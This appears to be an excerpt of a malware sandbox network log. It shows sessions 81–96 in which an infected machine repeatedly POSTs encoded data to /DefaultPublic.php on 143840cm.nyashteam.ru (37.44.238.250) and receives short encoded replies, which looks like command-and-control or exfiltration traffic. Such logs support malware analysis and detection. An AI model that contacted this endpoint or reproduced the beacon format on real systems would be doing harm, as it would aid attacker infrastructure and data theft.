Nov 25, 2024 22:39:15.335623026 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:15.581090927 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49975	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:15.826538086 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1040 Expect: 100-continue
Nov 25, 2024 22:39:16.177115917 CET	1040	OUT	Data Raw: 5a 5b 5f 5d 5d 50 55 50 59 59 54 56 57 58 55 5b 58 5f 5b 59 59 51 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z[_]]PUPYYTVWXU[X_[YYQVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#%0=<($;%!["4<U.+#+(8(-&'>0?&\%#P-$
Nov 25, 2024 22:39:17.189903021 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:17.462886095 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49980	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:17.707453966 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:18.052196026 CET	1048	OUT	Data Raw: 5a 5a 5a 58 5d 58 55 57 59 59 54 56 57 59 55 58 58 5a 5b 5d 59 59 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZZZX]XUWYYTVWYUXXZ[]YYVCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#3!(4^0S(Z25X"'$V8#?(!:[,%8]=20<>&\%#P-,
Nov 25, 2024 22:39:19.027400970 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:19.269145966 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49985	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:19.521553040 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:19.880289078 CET	1048	OUT	Data Raw: 5f 59 5f 58 5d 59 55 54 59 59 54 56 57 51 55 52 58 59 5b 58 59 51 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Y_X]YUTYYTVWQURXY[XYQVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$ ==98$6'2%%64#8'T?]<Z+- ]*2 ?.&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49988	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:20.582226992 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:20.927175999 CET	1764	OUT	Data Raw: 5f 5f 5a 5f 58 58 50 55 59 59 54 56 57 50 55 59 58 5e 5b 5b 59 5c 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: __Z_XXPUYYTVWPUYX^[[Y\VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [03&+]$$&5#4#/^ ++$?"&Z9%'?!?^(&\%#P-
Nov 25, 2024 22:39:21.897013903 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:22.145314932 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 58 23 13 01 51 30 2e 35 0b 2b 3c 0a 00 26 16 3a 02 30 03 28 0b 36 34 29 1d 24 5a 20 0c 20 05 3d 07 3c 07 22 0a 27 07 36 5a 27 1b 2e 51 01 13 21 02 22 0d 3d 55 3b 30 3b 5d 31 01 2f 1a 31 31 22 5c 2b 00 2f 53 22 1d 0c 05 2b 32 22 03 2d 2f 30 13 3d 05 3f 5a 3b 1e 23 19 21 05 2e 5f 08 13 23 52 3d 3f 24 0c 24 19 30 07 26 2f 23 11 22 04 22 51 30 33 26 0d 23 2c 0d 5c 2b 2d 02 10 21 10 3d 0f 24 5b 2d 05 24 32 2b 17 33 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %X#Q0.5+<&:0(64)$Z =<"'6Z'.Q!"=U;0;]1/11"\+/S"+2"-/0=?Z;#!._#R=?$$0&/#""Q03&#,\+-!=$[-$2+3"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49989	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:20.706459999 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:21.053631067 CET	1048	OUT	Data Raw: 5a 5c 5a 5c 58 5d 55 55 59 59 54 56 57 50 55 5b 58 54 5b 58 59 50 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\Z\X]UUYYTVWPU[XT[XYPVHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^3&+:03%+2%=X5$//;R+8<?!-6,^>T7\(&\%#P-
Nov 25, 2024 22:39:21.975863934 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:22.208544970 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49995	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:22.450330019 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:39:22.802197933 CET	1048	OUT	Data Raw: 5f 5a 5f 53 5d 5c 55 52 59 59 54 56 57 59 55 53 58 5a 5b 5d 59 5f 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _Z_S]\URYYTVWYUSXZ[]Y_VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV [332Z<?3 2%%]"'8;();0+-[>1?<&\%#P-,
Nov 25, 2024 22:39:23.814040899 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:24.066232920 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	50000	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:24.316431999 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:39:24.661562920 CET	1048	OUT	Data Raw: 5a 5b 5a 5b 5d 58 55 54 59 59 54 56 57 5a 55 5d 58 5e 5b 5d 59 51 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z[Z[]XUTYYTVWZU]X^[]YQVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#3.Y<0['5#%&)6T/8S++'+2:Y-3!#?>&\%#P-
Nov 25, 2024 22:39:25.696994066 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:25.954508066 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	50004	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:26.212064028 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:26.568065882 CET	1048	OUT	Data Raw: 5f 5e 5f 53 58 5d 55 5a 59 59 54 56 57 5a 55 5e 58 5f 5b 5e 59 5a 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^_SX]UZYYTVWZU^X_[^YZVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^$_()4[35?1Z5B<U8;8);<1&-&#=$>&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	50009	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:27.268057108 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:27.614785910 CET	1764	OUT	Data Raw: 5a 5f 5f 5a 5d 5d 55 51 59 59 54 56 57 5a 55 5a 58 5c 5b 5b 59 59 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z__Z]]UQYYTVWZUZX\[[YYVAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$0>X(:\'%+%C)5B/.;;R+],](>-5>+^?&\%#P-
Nov 25, 2024 22:39:28.599040031 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:28.841114044 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5b 34 3d 2b 50 27 04 3e 54 29 3f 23 5b 24 3b 39 1d 27 04 30 43 23 27 3d 5f 24 2c 3f 52 23 02 22 5a 28 2d 2d 1d 24 2d 21 03 27 31 2e 51 01 13 22 58 21 23 2d 56 3b 30 27 14 25 38 28 44 32 32 31 03 3f 2e 3b 51 35 1d 29 10 3c 1c 2d 59 3b 12 06 58 29 15 09 1d 2d 20 2c 0e 22 3f 2e 5f 08 13 23 56 3d 3c 34 0d 30 34 3b 5e 26 3f 27 11 35 3a 22 54 27 23 2e 08 23 2c 2c 01 2b 13 30 58 36 07 32 1f 24 04 21 03 24 0f 20 0b 27 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %[4=+P'>T)?#[$;9'0C#'=_$,?R#"Z(--$-!'1.Q"X!#-V;0'%8(D221?.;Q5)<-Y;X)- ,"?._#V=<404;^&?'5:"T'#.#,,+0X62$!$ '"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	50010	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:27.396212101 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:27.755354881 CET	1048	OUT	Data Raw: 5a 5e 5f 5d 5d 5f 50 52 59 59 54 56 57 5d 55 5e 58 55 5b 5b 59 58 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_]]_PRYYTVW]U^XU[[YXVEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $#(:$$%/'6![!4;;;7U+?+1-9,=!?_?&\%#P-<
Nov 25, 2024 22:39:28.713279963 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:28.958699942 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	50014	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:29.201534033 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:39:29.552237034 CET	1048	OUT	Data Raw: 5a 59 5a 5c 5d 59 55 54 59 59 54 56 57 59 55 5e 58 5b 5b 53 59 5c 56 43 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZYZ\]YUTYYTVWYU^X[[SY\VCZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y'1(:4$S<Z&>"V8^4(]8(*X:/>#_?>&\%#P-,
Nov 25, 2024 22:39:30.470933914 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:30.704149008 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	50020	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:30.956665039 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:31.302217007 CET	1048	OUT	Data Raw: 5a 5c 5f 52 58 58 55 52 59 59 54 56 57 5a 55 5c 58 5a 5b 52 59 5c 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\_RXXURYYTVWZU\XZ[RY\V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _$0.^?;0'&5$,;+8Y?1968=3>&\%#P-
Nov 25, 2024 22:39:32.296842098 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:32.533099890 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	50023	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:32.781739950 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:33.130424023 CET	1048	OUT	Data Raw: 5a 5c 5f 58 5d 5b 55 52 59 59 54 56 57 5e 55 5a 58 5f 5b 5d 59 59 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\_X][URYYTVW^UZX_[]YYVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X33<\$&&<_'5%"8/7T?];?:.%[*4<&\%#P-0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	50029	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:33.970741034 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:34.318409920 CET	1764	OUT	Data Raw: 5f 58 5f 5c 5d 59 55 51 59 59 54 56 57 51 55 5c 58 54 5b 5f 59 58 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_\]YUQYYTVWQU\XT[_YXVHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV '=)4\$%[%5X"$88?3<T%,6 ?17?&\%#P-
Nov 25, 2024 22:39:35.292526007 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:35.537194014 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5a 20 5b 2f 52 25 2d 03 0e 29 2c 0d 13 25 06 3d 5e 30 2e 28 09 35 24 18 07 26 2f 28 08 20 3c 04 59 28 00 29 1e 33 3e 32 5a 30 31 2e 51 01 13 22 13 22 1d 26 0c 38 23 28 06 26 2b 3c 09 26 31 32 16 28 3d 37 50 36 23 0c 04 3f 21 25 1f 38 2c 30 58 2a 2b 27 10 3b 0e 0d 1b 36 2f 2e 5f 08 13 23 1d 28 2f 3f 1c 30 09 19 5e 24 3c 2c 0c 22 29 39 0c 27 0d 3a 0f 21 3f 38 07 2b 5b 38 1e 21 07 3d 0b 30 3d 29 05 24 1f 3f 1a 33 13 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %Z [/R%-),%=^0.(5$&/( <Y()3>2Z01.Q""&8#(&+<&12(=7P6#?!%8,0X*+';6/._#(/?0^$<,")9':!?8+[8!=0=)$?3"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	50030	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:34.091527939 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:34.446309090 CET	1048	OUT	Data Raw: 5a 5e 5f 5e 5d 59 50 56 59 59 54 56 57 50 55 58 58 59 5b 5a 59 5d 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_^]YPVYYTVWPUXXY[ZY]V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _'!+ ^' X'6!Y5'$80(<Y*1-:C3="<>&\%#P-
Nov 25, 2024 22:39:35.412062883 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:35.661112070 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	50034	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:35.911921024 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1040 Expect: 100-continue
